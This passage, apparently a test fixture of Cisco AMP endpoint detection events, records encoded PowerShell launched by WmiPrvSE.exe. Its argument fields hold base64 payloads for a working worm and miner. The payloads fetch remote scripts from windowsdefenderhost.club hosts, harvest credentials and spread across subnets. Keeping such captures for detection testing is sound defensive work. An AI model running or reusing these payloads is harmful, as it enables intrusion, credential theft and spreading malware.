AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0A